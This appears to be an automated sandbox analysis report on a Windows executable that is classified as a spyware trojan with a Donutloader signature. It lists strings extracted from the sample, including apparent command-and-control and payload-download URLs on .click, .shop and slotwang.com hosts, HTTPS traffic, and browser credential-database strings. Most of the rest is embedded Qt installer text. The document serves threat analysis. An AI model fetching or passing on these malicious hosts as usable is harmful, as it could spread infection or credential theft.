              Source: BDxsBr8Dce.exe, 00000000.00000003.2386217778.0000000001D81000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3237169586.0000000001D81000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.2386465145.0000000001D04000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.2386217778.0000000001D6F000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3237155372.0000000001D70000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3236997897.0000000001D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kliplorihoe0.shop/int_clp_ldr_pan.txt
              Source: BDxsBr8Dce.exe, 00000000.00000002.3237666672.0000000003D4A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://kliplorihoe0.shop/int_clp_ldr_pan.txt537.36
              Source: BDxsBr8Dce.exe, 00000000.00000003.2386465145.0000000001D04000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3236997897.0000000001D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kliplorihoe0.shop/int_clp_ldr_pan.txtfu
              Source: BDxsBr8Dce.exe, 00000000.00000003.1599778820.0000000001D6B000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.2386465145.0000000001CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://poweryressz.click/
              Source: BDxsBr8Dce.exe, 00000000.00000003.2386217778.0000000001D81000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1752367178.0000000001D85000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.2386501646.0000000001D85000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3237260851.0000000001D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://poweryressz.click/-Control
              Source: BDxsBr8Dce.exe, 00000000.00000002.3237107985.0000000001D5D000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1646245461.00000000047DD000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.2386217778.0000000001D81000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1752392605.0000000001D81000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1708797314.00000000047F7000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1670500741.00000000047F5000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1692027815.00000000047F5000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1645810683.00000000047F4000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3237169586.0000000001D81000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3236997897.0000000001CEE000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1645754992.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1645986650.00000000047DD000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1670933153.00000000047DD000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1668872001.00000000047F5000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.2386339814.00000000047F4000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1668699168.00000000047F5000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1752180305.0000000001D5D000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.2386465145.0000000001CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://poweryressz.click/api
              Source: BDxsBr8Dce.exe, 00000000.00000003.1708797314.00000000047F7000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1670500741.00000000047F5000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1692027815.00000000047F5000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1668872001.00000000047F5000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.2386339814.00000000047F4000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1668699168.00000000047F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poweryressz.click/api9v
              Source: BDxsBr8Dce.exe, 00000000.00000003.1668762965.0000000001D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://poweryressz.click/apia
              Source: BDxsBr8Dce.exe, 00000000.00000003.1668762965.0000000001D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://poweryressz.click/apih
              Source: BDxsBr8Dce.exe, 00000000.00000003.2386217778.0000000001D81000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1752392605.0000000001D81000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3237169586.0000000001D81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://poweryressz.click/apilC
              Source: BDxsBr8Dce.exe, 00000000.00000003.1692106471.0000000001D85000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1691967736.0000000001D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://poweryressz.click:443/api-
              Source: BDxsBr8Dce.exe, 00000000.00000003.1549536823.0000000004A94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: BDxsBr8Dce.exe, 00000000.00000003.2386465145.0000000001D04000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3236997897.0000000001D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://slotwang.com/file/SigmaHealth.exe
              Source: BDxsBr8Dce.exe, 00000000.00000003.1647439842.0000000004A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: BDxsBr8Dce.exe, 00000000.00000003.1647439842.0000000004A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: BDxsBr8Dce.exe, 00000000.00000003.1647849824.00000000047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
              Source: BDxsBr8Dce.exe, 00000000.00000003.1600138824.000000000479C000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600209487.0000000004799000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600292349.0000000004799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: BDxsBr8Dce.exe, 00000000.00000003.1600138824.000000000479C000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600209487.0000000004799000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600292349.0000000004799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: BDxsBr8Dce.exe, 00000000.00000003.1647849824.00000000047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
              Source: BDxsBr8Dce.exe, 00000000.00000003.1647439842.0000000004A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
              Source: BDxsBr8Dce.exe, 00000000.00000003.1647439842.0000000004A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
              Source: BDxsBr8Dce.exe, 00000000.00000003.1647439842.0000000004A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: BDxsBr8Dce.exe, 00000000.00000003.1647439842.0000000004A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: BDxsBr8Dce.exe, 00000000.00000003.1647439842.0000000004A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: BDxsBr8Dce.exe, 00000000.00000003.1647439842.0000000004A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownHTTPS traffic detected: 172.67.149.196:443 -> 192.168.2.9:49759 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.196:443 -> 192.168.2.9:49765 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.196:443 -> 192.168.2.9:49771 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.196:443 -> 192.168.2.9:49777 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.196:443 -> 192.168.2.9:49783 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.196:443 -> 192.168.2.9:49789 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.196:443 -> 192.168.2.9:49796 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.196:443 -> 192.168.2.9:49807 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.182.135:443 -> 192.168.2.9:49813 version: TLS 1.2

              System Summary

              barindex
              Source: 00000000.00000002.3236849653.0000000001C10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00FDC2D00_2_00FDC2D0
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00DE44200_2_00DE4420
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_009185700_2_00918570
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_0104C9F00_2_0104C9F0
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_007710D00_2_007710D0
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_01074BE00_2_01074BE0
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_011092FE0_2_011092FE
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_0110F6120_2_0110F612
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_008F38A00_2_008F38A0
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_010519300_2_01051930
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_008678E00_2_008678E0
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00DA79D00_2_00DA79D0
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: String function: 0110391A appears 34 times
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: String function: 0110379E appears 36 times
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: String function: 011148F0 appears 34 times
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: String function: 00F8D700 appears 41 times
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: String function: 00F80D70 appears 89 times
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: String function: 00F73EB0 appears 50 times
              Source: BDxsBr8Dce.exeStatic PE information: invalid certificate
              Source: BDxsBr8Dce.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000000.00000002.3236849653.0000000001C10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: BDxsBr8Dce.exeBinary string: \Device\HarddiskVolume%1\
              Source: BDxsBr8Dce.exeBinary string: GKernel32.dllQueryFullProcessImageNameAPsapi.dllGetProcessImageFileNameA\Device\HarddiskVolume%1\\\
              Source: BDxsBr8Dce.exeBinary or memory string: nsberg.noedu.ruedu.rwedu.sgkomae.tokyo.jpmazowsze.plshintoku.hokkaido.jplans.museumedu.slnom.mgl
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/2
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00F70DB0 GetLastError,FormatMessageW,LocalFree,0_2_00F70DB0
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_008A67C0 CoCreateInstance,0_2_008A67C0
              Source: BDxsBr8Dce.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: BDxsBr8Dce.exe, 00000000.00000003.1600590926.000000000476B000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600451712.0000000004787000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: BDxsBr8Dce.exeReversingLabs: Detection: 26%
              Source: BDxsBr8Dce.exeString found in binary or memory: Wrong argument(s) for option --startserver.
              Source: BDxsBr8Dce.exeString found in binary or memory: no-force-installations
              Source: BDxsBr8Dce.exeString found in binary or memory: <!--StartFragment-->
              Source: BDxsBr8Dce.exeString found in binary or memory: --startserver
              Source: BDxsBr8Dce.exeString found in binary or memory: Your installation seems to be corrupted. Please consider re-installing from scratch.
              Source: BDxsBr8Dce.exeString found in binary or memory: Wrong argument(s) for option --startserver.
              Source: BDxsBr8Dce.exeString found in binary or memory: Installer Framework SHA1: "4d8d527"Build date: "Jun 1 2015"IFW Version: "2.0.1"yyyy-MM-dd - HH:mm:ssInstaller creation time: 2.0.1The following options are mutually exclusive: %1., Wrong argument(s) for option --startserver.1quit()2destroyed()Unknown option: Unknown exception caught.:/metadataException thrown: %sstring too longinvalid string positionbad cast
              Source: BDxsBr8Dce.exeString found in binary or memory: no-force-installations
              Source: BDxsBr8Dce.exeString found in binary or memory: ifw_srvDefaultAuthorizationKeyproxyscriptupdatermanage-packagesno-force-installationsshow-virtual-componentslogging-rulescreate-local-repositoryaddRepositoryaddTempRepositorysetTempRepositorystartclient
              Source: BDxsBr8Dce.exeString found in binary or memory: :/metadata/installer-config/
              Source: BDxsBr8Dce.exeString found in binary or memory: create Error-Exception:/lockmyApp1234865.lockAnother %1 instance is already running. Wait until it finishes, close it, or restart your system.Waiting for %1AlreadyRunningifw.* = falseLanguage:No UI language setArguments: QResources:/metadata/Updates.xmlScript file does not exist.:/metadata/installer-config/Cannot start installer binary as updater.Cannot start installer binary as package manager.Empty repository list for option 'addRepository'.Empty repository list for option 'addTempRepository'.Empty repository list for option 'setTempRepository'.:/translations_qtResource tree::/:/qt-project.org Adding custom repository:.datfalsetrue
              Source: BDxsBr8Dce.exeString found in binary or memory: /lockmyApp15021976.lockAn instance is already checking for updates.Installers cannot check for updates.There are currently no updates available.updatesupdatenameversionsizeKey=Valueversionframework-versionvverboseproxyscriptcheckupdatesupdatermanage-packagesno-force-installationsshow-virtual-componentslogging-rulescreate-local-repositoryaddRepositoryaddTempRepositorysetTempRepositorystartserverstartclientDisplays version information.Displays the version of the Qt Installer Framework.Verbose mode. Prints out more information.Use system proxy on Windows and Linux. This option has no effect on OS X.fileExecute the script given as argument.Check for updates and return an XML description.Start application in updater mode.Start application in package manager mode.Allow deselecting components that are marked as forced.Show virtual components in installer and package manager.rulesEnables logging according to passed rules. Comma separated logging rules have the following syntax: loggingCategory=true/false. Passing empty logging rules enables all logging categories. The following rules enable a single category: ifw.*=false,ifw.category=true The following logging categories are available:
              Source: BDxsBr8Dce.exeString found in binary or memory: Your installation seems to be corrupted. Please consider re-installing from scratch.
              Source: BDxsBr8Dce.exeString found in binary or memory: Downloading packages...1cancel()2installationInterrupted()1emitLabelAndDetailTextChanged(QString)2outputTextChanged(QString)2downloadStatusChanged(QString)2progressChanged(double)Installation canceled by userAll downloads finished.Cancelling the InstallerprogressChanged(double)adminuninstall-onlyMkdirforceremovalcomponentSome components could not be removed completely because admin rights could not be acquired: %1.Authentication ErrorElevationErrorSome components could not be removed completely because an unknown error happened.Unknown error.unknownHKEY_CLASSES_ROOT.%1/DefaultQInstaller::PackageManagerCore::StatusQInstaller::PackageManagerCore::WizardPageOperations missing for installed packagesOrphaned operationsYour installation seems to be corrupted. Please consider re-installing from scratch.Corrupt installationCorrupt_Installation_ErrorOperations sanity check succeeded.InstallationLog.txtLogFileNameApplication not running in Package Manager mode!No installed packages found.Could not register component! Component with identifier %s already registered.Application running in Uninstaller mode!There is an important update available, please run the updater first.AllComponentsModel1setRootComponents(QList<QInstaller::Component*>)2finishAllComponentsReset(QList<QInstaller::Component*>)UpdaterComponentsModel2finishUpdaterComponentsReset(QList<QInstaller::Component*>)Error while elevating access rights.try to kill process: %1(%2)
              Source: BDxsBr8Dce.exeString found in binary or memory: :/installer
              Source: BDxsBr8Dce.exeString found in binary or memory: CftphttphttpsCould not register file downloader for https protocol: QSslSocket::supportsSsl() returns falseControlScriptQNetworkProxyQInstaller::RepositoryInstallerApplicationIconInstallerWindowIconLogoPrefixWatermarkBannerProductUrlBackgroundAdminTargetDirMaintenanceToolNameUserRepositoriesTemporaryRepositoriesMaintenanceToolIniFileRemoteRepositoriesDependsOnLocalInstallerBinaryTranslationsFtpProxyHttpProxyProxyTypeIgnoring following settings reader error in %1, line %2, column %3: %4Ignoring following settings reader error: %sUnexpected attribute for element '%1'.Unexpected element '%1'.\s+UrlEnabled/:/overrideconfig.xmlCould not open settings file %1 for reading: %2InstallerUnexpected element '%1' as root element.Element '%1' has been defined before.TranslationArgumentError in %1, line %2, column %3: %4Missing or empty <Name> tag in %1.Missing or empty <Version> tag in %1.:/installermaintenancetoolUninstallerNamecomponents.xml.iniUninstallerIniFile.icoreplaceremoveaddifw.componentCheckerifw.resourcesifw.translations\b(,|, )\b
              Source: BDxsBr8Dce.exeString found in binary or memory: :/metadata/installer-config/config.xml
              Source: BDxsBr8Dce.exeString found in binary or memory: GQSettingsrootDirhomeDirRootDirHomeDirInstallerDirPathInstallerFilePath/optApplicationsDirwinosHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell FoldersHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersProgramsCommon ProgramsDesktopDesktopDir:/metadata/installer-config/config.xmlProductVersion\\|/
              Source: BDxsBr8Dce.exeString found in binary or memory: --startserver
              Source: BDxsBr8Dce.exeString found in binary or memory: {RemoteClientPrivateKeepAlive--startserver%1,%2,%3Could not get authorization that is needed for continuing the installation.
              Source: BDxsBr8Dce.exeString found in binary or memory: /installer-config
              Source: BDxsBr8Dce.exeString found in binary or memory: FfilesCould not set file permissions %1!/%1meta.7zCould not move file %1 to %2. Error: %3Installer needs to be an offline version: %1.:/metadata/Updates.xmlCould not open file: %1Could not read: %1. Error: %2Could not open file: %1. Error: %2Could not create target dir: %1./installer-config/config*.qrcUnknown exception caught: %1.bool __thiscall QInstaller::CreateLocalRepositoryOperation::performOperation(void)Removing file: %0Could not remove %0.Cannot remove directory %1: %2
              Source: BDxsBr8Dce.exeString found in binary or memory: dialog-help-icon
              Source: BDxsBr8Dce.exeString found in binary or memory: filedialog-start-icon
              Source: BDxsBr8Dce.exeString found in binary or memory: activate-on-singleclickarrow-keys-navigate-into-childrenbackward-iconbutton-layoutcd-iconcombobox-list-mousetrackingcombobox-popupcomputer-icondesktop-icondialog-apply-icondialog-cancel-icondown-arrowdialog-close-iconup-arrowdialog-discard-iconleft-arrowdialog-help-iconright-arrowdialog-no-iconindicatordialog-ok-iconmenu-indicatordialog-open-icondrop-downdialog-reset-icondialog-save-iconup-buttondialog-yes-icondown-buttondialogbuttonbox-buttons-have-iconstitledirectory-closed-iconmenu-buttondirectory-iconmenu-arrowdirectory-link-icontabdirectory-open-icondither-disable-textadd-pagedockwidget-close-iconsub-pagedownarrow-iconadd-linedvd-iconsub-lineetch-disabled-textfirstfile-iconlastfile-link-iconfiledialog-backward-iconscrollerfiledialog-contentsview-icontearofffiledialog-detailedview-iconiconfiledialog-end-iconbranchfiledialog-infoview-iconsectionfiledialog-listview-iconchunkfiledialog-new-directory-icontearfiledialog-parent-directory-icongroovefiledialog-start-icontick-markfloppy-iconpaneforward-icontab-bargridline-colorleft-cornerharddisk-iconright-cornerhome-iconclose-buttonicon-sizefloat-buttonleftarrow-iconminimize-buttonlineedit-password-characternormal-buttonlineedit-password-mask-delaymaximize-buttonmdi-fill-space-on-maximizeshade-buttonmenu-scrollableunshade-buttonmenubar-altkey-navigationcontexthelp-buttonmenubar-separatorsys-menumessagebox-critical-icontextmessagebox-information-iconcornermessagebox-question-iconmessagebox-text-interaction-flagsmessagebox-warning-iconmouse-trackingnetwork-iconopacitypaint-alternating-row-colors-for-empty-arearightarrow-iconscrollbar-contextmenuscrollbar-leftclick-absolute-positionscrollbar-middleclick-absolute-positionscrollbar-roll-between-buttonsscrollbar-scroll-when-pointer-leaves-controlscrollview-frame-around-contentsshow-decoration-selectedspinbox-click-autorepeat-ratespincontrol-disable-on-boundstabbar-elide-modetabbar-prefer-no-arrowstitlebar-close-icontitlebar-contexthelp-icontitlebar-maximize-icontitlebar-menu-icontitlebar-minimize-icontitlebar-normal-icontitlebar-shade-icontitlebar-unshade-icontoolbutton-popup-delaytrash-iconuparrow-icon
              Source: BDxsBr8Dce.exeString found in binary or memory: activate-on-singleclickarrow-keys-navigate-into-childrenbackward-iconbutton-layoutcd-iconcombobox-list-mousetrackingcombobox-popupcomputer-icondesktop-icondialog-apply-icondialog-cancel-icondown-arrowdialog-close-iconup-arrowdialog-discard-iconleft-arrowdialog-help-iconright-arrowdialog-no-iconindicatordialog-ok-iconmenu-indicatordialog-open-icondrop-downdialog-reset-icondialog-save-iconup-buttondialog-yes-icondown-buttondialogbuttonbox-buttons-have-iconstitledirectory-closed-iconmenu-buttondirectory-iconmenu-arrowdirectory-link-icontabdirectory-open-icondither-disable-textadd-pagedockwidget-close-iconsub-pagedownarrow-iconadd-linedvd-iconsub-lineetch-disabled-textfirstfile-iconlastfile-link-iconfiledialog-backward-iconscrollerfiledialog-contentsview-icontearofffiledialog-detailedview-iconiconfiledialog-end-iconbranchfiledialog-infoview-iconsectionfiledialog-listview-iconchunkfiledialog-new-directory-icontearfiledialog-parent-directory-icongroovefiledialog-start-icontick-markfloppy-iconpaneforward-icontab-bargridline-colorleft-cornerharddisk-iconright-cornerhome-iconclose-buttonicon-sizefloat-buttonleftarrow-iconminimize-buttonlineedit-password-characternormal-buttonlineedit-password-mask-delaymaximize-buttonmdi-fill-space-on-maximizeshade-buttonmenu-scrollableunshade-buttonmenubar-altkey-navigationcontexthelp-buttonmenubar-separatorsys-menumessagebox-critical-icontextmessagebox-information-iconcornermessagebox-question-iconmessagebox-text-interaction-flagsmessagebox-warning-iconmouse-trackingnetwork-iconopacitypaint-alternating-row-colors-for-empty-arearightarrow-iconscrollbar-contextmenuscrollbar-leftclick-absolute-positionscrollbar-middleclick-absolute-positionscrollbar-roll-between-buttonsscrollbar-scroll-when-pointer-leaves-controlscrollview-frame-around-contentsshow-decoration-selectedspinbox-click-autorepeat-ratespincontrol-disable-on-boundstabbar-elide-modetabbar-prefer-no-arrowstitlebar-close-icontitlebar-contexthelp-icontitlebar-maximize-icontitlebar-menu-icontitlebar-minimize-icontitlebar-normal-icontitlebar-shade-icontitlebar-unshade-icontoolbutton-popup-delaytrash-iconuparrow-icon
              Source: BDxsBr8Dce.exeString found in binary or memory: Gstandardbutton-help-32.png
              Source: BDxsBr8Dce.exeString found in binary or memory: standardbutton-help-128.png
              Source: BDxsBr8Dce.exeString found in binary or memory: media-stop-16.png
              Source: BDxsBr8Dce.exeString found in binary or memory: media-stop-32.png
              Source: BDxsBr8Dce.exeString found in binary or memory: Gstandardbutton-help-16.png
              Source: BDxsBr8Dce.exeString found in binary or memory: process-stop
              Source: BDxsBr8Dce.exeString found in binary or memory: media-playback-start
              Source: BDxsBr8Dce.exeString found in binary or memory: media-playback-stop
              Source: BDxsBr8Dce.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/standardbutton-help-16.png
              Source: BDxsBr8Dce.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/stop-24.png
              Source: BDxsBr8Dce.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/stop-24.png
              Source: BDxsBr8Dce.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/media-stop-32.png
              Source: BDxsBr8Dce.exeString found in binary or memory: w:/qt-project.org/styles/commonstyle/images/standardbutton-closetab-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-closetab-down-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-closetab-hover-16.png1_q_removeAnimation()100%QCommonStyle::drawComplexControl: Control %d not handledQCommonStyle::hitTestComplexControl: Case %d not handledQCommonStyle::subControlRect: Case %d not handledxpm:0x%pdialog-okdialog-ok-applyedit-deletedialog-closeuser-homemessagebox_infomessagebox_warningmessagebox_criticalhelpfolder-openemptytext-x-genericfolder3floppy_unmountmedia-floppycomputeruser-desktoptrashcan_emptyuser-trashcdrom_unmountmedia-opticalhdd_unmountdrive-harddiskupgo-upfolder_newdowngo-downforwardgo-nextbackgo-previousview_detailedview_iconreloadprocess-stopmedia-playback-startmedia-playback-pausemedia-playback-stopmedia-seek-forwardmedia-seek-backwardmedia-skip-forwardmedia-skip-backwardedit-clearhelp-contentsdialog-canceldocument-saveemblem-symbolic-link:/qt-project.org/styles/commonstyle/images/left-16.png:/qt-project.org/styles/commonstyle/images/right-16.png:/qt-project.org/styles/commonstyle/images/up-16.png:/qt-project.org/styles/commonstyle/images/down-16.png:/qt-project.org/styles/commonstyle/images/newdirectory-16.png:/qt-project.org/styles/commonstyle/images/viewdetailed-16.png:/qt-project.org/styles/commonstyle/images/fileinfo-16.png:/qt-project.org/styles/commonstyle/images/filecontents-16.png:/qt-project.org/styles/commonstyle/images/viewlist-16.png:/qt-project.org/styles/commonstyle/images/harddrive-16.png:/qt-project.org/styles/commonstyle/images/trash-16.png:/qt-project.org/styles/commonstyle/images/floppy-16.png:/qt-project.org/styles/commonstyle/images/networkdrive-16.png:/qt-project.org/styles/commonstyle/images/desktop-16.png:/qt-project.org/styles/commonstyle/images/computer-16.png:/qt-project.org/styles/commonstyle/images/cdr-16.png:/qt-project.org/styles/commonstyle/images/dvd-16.png:/qt-project.org/styles/commonstyle/images/diropen-16.png:/qt-project.org/styles/commonstyle/images/dirclosed-16.png:/qt-project.org/styles/commonstyle/images/dirlink-16.png:/qt-project.org/styles/commonstyle/images/file-16.png:/qt-project.org/styles/commonstyle/images/filelink-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-ok-1